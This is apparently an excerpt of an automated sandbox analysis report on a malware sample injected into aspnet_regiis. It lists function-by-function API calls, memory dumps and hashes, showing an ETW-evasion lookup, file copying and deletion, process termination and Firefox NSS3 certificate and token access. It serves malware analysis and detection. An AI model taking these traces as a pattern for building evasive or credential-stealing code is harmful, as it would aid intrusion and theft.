                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CapsCreateDeviceRelease
                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                              • API String ID: 1843228801-865373369
                                                                                                                                                                              • Opcode ID: 831414297057cffbed2ec567c1f12d2674e41fec2723601a19170158bd93ff06
                                                                                                                                                                              • Instruction ID: ebfca89f2d7e14c79427384411bcf5c35cc3b8a6db1668625712742eb2c14639
                                                                                                                                                                              • Opcode Fuzzy Hash: 831414297057cffbed2ec567c1f12d2674e41fec2723601a19170158bd93ff06
                                                                                                                                                                              • Instruction Fuzzy Hash: C8D01235BC030477F1741650BC4FF2A2A24E7D6F02F200404F303580C04EB054139636
                                                                                                                                                                              Function 02A018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02A018BA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 02A018CB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                              • String ID: EtwEventWrite$ntdll.dll
                                                                                                                                                                              • API String ID: 1646373207-1851843765
                                                                                                                                                                              • Opcode ID: 6bed3f81de2052526ad3448989ff5d276d611be43a120f090bcdaa3ff0c3c4c9
                                                                                                                                                                              • Instruction ID: b046af4595da0f5abb43219252e0015bc0cd1f36c8c975329465198061eba391
                                                                                                                                                                              • Opcode Fuzzy Hash: 6bed3f81de2052526ad3448989ff5d276d611be43a120f090bcdaa3ff0c3c4c9
                                                                                                                                                                              • Instruction Fuzzy Hash: 94B09271B80210A7BE016FB56DCDE873B5A7A42B023800884B68BC0402EFB4C8269610
                                                                                                                                                                              Function 02A0B021 Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A0B0C6
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B27C
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A0B297
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A0B2E9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                              • Opcode ID: daece7cc4878d952c2e13fe05f2efcc2e38689e96b689e8ff95bad085b9caa65
                                                                                                                                                                              • Instruction ID: 3abe98a86c26f742c360e9b18a110d02e7addd2b54f10832c3b6a39e61c2affe
                                                                                                                                                                              • Opcode Fuzzy Hash: daece7cc4878d952c2e13fe05f2efcc2e38689e96b689e8ff95bad085b9caa65
                                                                                                                                                                              • Instruction Fuzzy Hash: C981EB32D802299BDF01FBA4EE85ADDB776BF04364F514521E900B71A0DF70AE598FA1
                                                                                                                                                                              Function 02A1BFC6 Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,76F883C0,00000000,?,?,?,?,?,?,02A1C58F,?,02A16F27,?), ref: 02A1C019
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,02A1C58F,?,02A16F27), ref: 02A1C049
                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,02A1C58F,?,02A16F27,?), ref: 02A1C075
                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,02A1C58F,?,02A16F27,?), ref: 02A1C083
                                                                                                                                                                                • Part of subcall function 02A1B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,09ED2488), ref: 02A1B9C5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3986731826-0
                                                                                                                                                                              • Opcode ID: 08186477a8ee992325ca08092450566c0bb8d095432af61f7809b3f182f05e7c
                                                                                                                                                                              • Instruction ID: 91f9f6e6fdfb808ae146a96585e481946c73ab0982697b01e50ce948e29917e9
                                                                                                                                                                              • Opcode Fuzzy Hash: 08186477a8ee992325ca08092450566c0bb8d095432af61f7809b3f182f05e7c
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C417A71840209DFCF10DF69C880AAEBBF9FF48324F10056AE855EB256EB309546CFA1
                                                                                                                                                                              Function 02A1BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • malloc.MSVCRT ref: 02A1BDC5
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A1BDD9
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A1BE26
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,66FDBAB5,?,00000000,09ED2488,?,00000001,09ED2488,?,02A1AE6B,?,00000001,09ED2488,66FDBAB5,?), ref: 02A1BE45
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove$FileWritemalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 803809635-0
                                                                                                                                                                              • Opcode ID: e157d5475cc4e0a7052f7b5ce452651333287ae3055a11e16681000b6e699449
                                                                                                                                                                              • Instruction ID: 17f0f19de976e4f729f1486c30a0b7469140370076a413a5041db48dd81f23bd
                                                                                                                                                                              • Opcode Fuzzy Hash: e157d5475cc4e0a7052f7b5ce452651333287ae3055a11e16681000b6e699449
                                                                                                                                                                              • Instruction Fuzzy Hash: CA314C75600704AFD725CF65DA80BA6B7F9FB44768B40892EEA4687A40DF70F9048F60
                                                                                                                                                                              Function 02A122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A122D7
                                                                                                                                                                                • Part of subcall function 02A11D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02A12301,?), ref: 02A11D6C
                                                                                                                                                                                • Part of subcall function 02A11D61: RtlAllocateHeap.NTDLL(00000000), ref: 02A11D73
                                                                                                                                                                                • Part of subcall function 02A11D61: wsprintfW.USER32 ref: 02A11D84
                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 02A1237D
                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 02A1238B
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A12392
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4082384872-0
                                                                                                                                                                              • Opcode ID: c1854ba10e36de482462c0b7fea371a006056e2c9a8fa8288146469271426191
                                                                                                                                                                              • Instruction ID: 985a21f88e38ae23cc2e791356410aca4c358ea203fecdd05a888bb25871694c
                                                                                                                                                                              • Opcode Fuzzy Hash: c1854ba10e36de482462c0b7fea371a006056e2c9a8fa8288146469271426191
                                                                                                                                                                              • Instruction Fuzzy Hash: 95310F72A41228AFDB219FA4DD84AEE77BDEB0A354F0404A5E909A2540DB309F858F52
                                                                                                                                                                              Function 6CBAACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CERT_NewCertList.NSS3 ref: 6CBAACC2
                                                                                                                                                                                • Part of subcall function 6CB82F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CB82F0A
                                                                                                                                                                                • Part of subcall function 6CB82F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CB82F1D
                                                                                                                                                                                • Part of subcall function 6CB82AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CB80A1B,00000000), ref: 6CB82AF0
                                                                                                                                                                                • Part of subcall function 6CB82AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB82B11
                                                                                                                                                                              • CERT_DestroyCertList.NSS3(00000000), ref: 6CBAAD5E
                                                                                                                                                                                • Part of subcall function 6CBC57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CB8B41E,00000000,00000000,?,00000000,?,6CB8B41E,00000000,00000000,00000001,?), ref: 6CBC57E0
                                                                                                                                                                                • Part of subcall function 6CBC57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CBC5843
                                                                                                                                                                              • CERT_DestroyCertList.NSS3(?), ref: 6CBAAD36
                                                                                                                                                                                • Part of subcall function 6CB82F50: CERT_DestroyCertificate.NSS3(?), ref: 6CB82F65
                                                                                                                                                                                • Part of subcall function 6CB82F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB82F83
                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CBAAD4F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 132756963-0
                                                                                                                                                                              • Opcode ID: 2293cac1dbbc8527bdd7313120561bc515799c59785df38e6f8e87da281bdb9d
                                                                                                                                                                              • Instruction ID: dce0ab289563cf51c484e59be82645fe5ae6b130123dc9d73967cc26e264bb3b
                                                                                                                                                                              • Opcode Fuzzy Hash: 2293cac1dbbc8527bdd7313120561bc515799c59785df38e6f8e87da281bdb9d
                                                                                                                                                                              • Instruction Fuzzy Hash: F12193B1D012549BEB10DFA4D9055EEB7B4EF05218F454069D885BB600FB31AA5ACFB2
                                                                                                                                                                              Function 6CBDECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CBDF0AD,6CBDF150,?,6CBDF150,?,?,?), ref: 6CBDECBA
                                                                                                                                                                                • Part of subcall function 6CBE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB887ED,00000800,6CB7EF74,00000000), ref: 6CBE1000
                                                                                                                                                                                • Part of subcall function 6CBE0FF0: PR_NewLock.NSS3(?,00000800,6CB7EF74,00000000), ref: 6CBE1016
                                                                                                                                                                                • Part of subcall function 6CBE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB887ED,00000008,?,00000800,6CB7EF74,00000000), ref: 6CBE102B
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CBDECD1
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CBDED02
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE116E
                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CBDED5A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2957673229-0
                                                                                                                                                                              • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                              • Instruction ID: a26de4b6ec7e0af674cc0cea1c04df14ce3981fcf948c358a2c3f8eaeca902b6
                                                                                                                                                                              • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                              • Instruction Fuzzy Hash: 9821A4B19007D25BE700CF25D944B5AB7E4FFA9348F26C21AE81C87662EB70E594C6D1
                                                                                                                                                                              Function 6CC2AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CC15F17,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2AC94
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CC15F17,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2ACA6
                                                                                                                                                                              • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2ACC0
                                                                                                                                                                              • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CC1AAD4), ref: 6CC2ACDB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3989322779-0
                                                                                                                                                                              • Opcode ID: ff580ee5f94ca903e1e4ad46de8b8922a151366b08041f724b9f349912d925c4
                                                                                                                                                                              • Instruction ID: 5ef1c80e0551de2cd88a8d9faec044a23205f086c95dc05220504b8bfce4dd32
                                                                                                                                                                              • Opcode Fuzzy Hash: ff580ee5f94ca903e1e4ad46de8b8922a151366b08041f724b9f349912d925c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 58018CB5A01B119BE710DF29D908747B7E8BF40699B104839D85EC3A00EB35F054CB91
                                                                                                                                                                              Function 6CC2AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CC15D40,00000000,?,?,6CC06AC6,6CC1639C), ref: 6CC2AC2D
                                                                                                                                                                                • Part of subcall function 6CBCADC0: TlsGetValue.KERNEL32(?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE10
                                                                                                                                                                                • Part of subcall function 6CBCADC0: EnterCriticalSection.KERNEL32(?,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE24
                                                                                                                                                                                • Part of subcall function 6CBCADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CBAD079,00000000,00000001), ref: 6CBCAE5A
                                                                                                                                                                                • Part of subcall function 6CBCADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE6F
